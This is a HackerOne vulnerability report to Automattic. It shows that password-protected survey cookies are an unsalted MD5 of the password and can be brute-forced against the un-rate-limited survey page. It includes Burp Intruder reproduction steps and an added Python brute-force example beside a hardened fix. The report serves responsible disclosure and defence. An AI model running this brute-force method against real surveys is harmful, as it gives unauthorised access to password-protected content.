Automattic: No Rate Limit when accessing "Password protection" enabled surveys leads to bypassing passwords via "pd-pass_surveyid" cookie
2020-06-23T04:36:24
ID H1:905816 Type hackerone Reporter bugra Modified 2020-11-18T14:23:45
Description
Summary:
Hi team,
If you enter the right password on any password-protected survey, you will see this request:
{F878934}
This request is rate limited, which is good. But if you look at the response, you will see a cookie: the password protection feature is a cookie-based system.
In my survey, if you enter the right password, the system sets this cookie: pd-pass_DA0C46C4EAECF2BA=81dc9bdb52d04dc20036dbd8313ed055
Basically this is pd-pass_SURVEYID=md5(password): the cookie value is the plain MD5 hash of the right password (a hash, not encryption, and with no salt or server-side secret involved), and if you visit the survey page with this cookie, you can see the survey.
So, I tried to brute force this cookie with Burp Suite's Payload Processing feature (it can hash your value with any hash type). And it worked: there is no rate limit when directly accessing the survey page with the password cookie.
Actually, I didn't find any way to enumerate survey IDs. But when you go to a survey without password protection, the survey ID is in the page source, and if you enable password protection afterwards, the survey ID doesn't change.
So an attacker can save the survey ID before the survey creator enables the password protection feature.
Also, the WordPress.com Shortcode on the Sharing page leaks the survey ID too (but I don't know how it works; maybe this code turns into an iframe etc. when you paste it into any wordpress.com website).
{F878946}
Steps To Reproduce:
1. Go to your survey's Sharing page and copy the survey ID from the WordPress.com Shortcode.
2. Turn on intercept in Burp Suite and go to your password-protected survey.
3. Send the GET request to Intruder.
4. Add pd-pass_YOURSURVEYIDHERE=test to the Cookie header and set the payload position to the test value.
5. Now go to the Payloads tab in Intruder and set the Payload Processing feature like this:
{F878947}
6. Set the payload type to Brute forcer; you can change the other options like threads etc.
7. Start the attack.
You can watch the video :
{F878959}
Probably this issue affects quizzes too; I didn't test it.
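The cookie scheme described above (pd-pass_SURVEYID=md5(password)) and the Intruder attack from the reproduction steps, as an added Python example that is not part of the report and not Automattic's code. The survey ID and cookie value are the ones quoted in the report (md5("1234") is 81dc9bdb52d04dc20036dbd8313ed055, so the reporter's test password was 1234). The two server-side classes are constructed stand-ins for the survey page: VulnerableSurvey mirrors the behaviour the report describes, and HardenedSurvey is an assumed fix (rate-limited password endpoint that issues a random token, password stored with a salted PBKDF2 hash); the attempt counter and in-memory token store are simplifications, not the real service's design.

```python
import hashlib
import hmac
import itertools
import secrets
import string

# Survey ID and cookie value quoted in the report. md5("1234") is
# 81dc9bdb52d04dc20036dbd8313ed055, so the reporter's test password was 1234.
SURVEY_ID = "DA0C46C4EAECF2BA"
REPORTED_COOKIE_VALUE = "81dc9bdb52d04dc20036dbd8313ed055"


def cookie_name(survey_id: str) -> str:
    return f"pd-pass_{survey_id}"


def md5_cookie_value(password: str) -> str:
    # Unsalted MD5 of the password, exactly what the report says the cookie holds.
    return hashlib.md5(password.encode()).hexdigest()


class VulnerableSurvey:
    """Constructed stand-in for the server side the report describes: the
    survey page compares the cookie against md5(password) and applies no
    rate limit, so every guess costs one GET to the survey page."""

    def __init__(self, survey_id: str, password: str):
        self.survey_id = survey_id
        self._stored = md5_cookie_value(password)
        self.requests_seen = 0

    def get_survey(self, cookies: dict) -> bool:
        self.requests_seen += 1
        presented = cookies.get(cookie_name(self.survey_id), "")
        return hmac.compare_digest(presented, self._stored)


def brute_force(survey, charset: str = string.digits, max_len: int = 4):
    """Mirror of the Intruder attack: Brute forcer payloads run through an MD5
    payload-processing rule and placed in the pd-pass_<id> cookie. Returns the
    recovered password, or None if the keyspace is exhausted."""
    for length in range(1, max_len + 1):
        for chars in itertools.product(charset, repeat=length):
            guess = "".join(chars)
            cookies = {cookie_name(survey.survey_id): md5_cookie_value(guess)}
            if survey.get_survey(cookies):
                return guess
    return None


class HardenedSurvey:
    """Assumed fix (not Automattic's code): the password is only checked by a
    rate-limited endpoint, which hands back an unguessable random token. The
    cookie carries that token instead of a hash of the password, so the
    unthrottled survey page can no longer be used as a password oracle."""

    MAX_ATTEMPTS = 5          # assumption: simple per-survey attempt cap
    PBKDF2_ITERATIONS = 50_000

    def __init__(self, survey_id: str, password: str):
        self.survey_id = survey_id
        self._salt = secrets.token_bytes(16)
        self._stored = self._hash(password)
        self._tokens = set()  # assumption: server-side store of issued tokens
        self.attempts = 0

    def _hash(self, password: str) -> bytes:
        return hashlib.pbkdf2_hmac(
            "sha256", password.encode(), self._salt, self.PBKDF2_ITERATIONS)

    def submit_password(self, password: str):
        """The rate-limited endpoint. Returns the cookie to set on success,
        None on a wrong password, and refuses service once the cap is hit."""
        self.attempts += 1
        if self.attempts > self.MAX_ATTEMPTS:
            raise PermissionError("rate limited")
        if not hmac.compare_digest(self._hash(password), self._stored):
            return None
        token = secrets.token_urlsafe(32)
        self._tokens.add(token)
        return {cookie_name(self.survey_id): token}

    def get_survey(self, cookies: dict) -> bool:
        # Only a token previously issued by submit_password unlocks the page;
        # an md5(password) cookie is just an unknown token and is rejected.
        return cookies.get(cookie_name(self.survey_id)) in self._tokens


if __name__ == "__main__":
    target = VulnerableSurvey(SURVEY_ID, "1234")
    print("recovered:", brute_force(target), "after", target.requests_seen, "requests")
```

Against the vulnerable stand-in the digit-only search recovers 1234 after 2,345 requests to the survey page, none of which touch the rate-limited password endpoint. Against the hardened version the same md5 cookie is rejected, and guessing has to go through submit_password, which stops answering after MAX_ATTEMPTS.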
Impact
Bypassing password-protected surveys by brute force.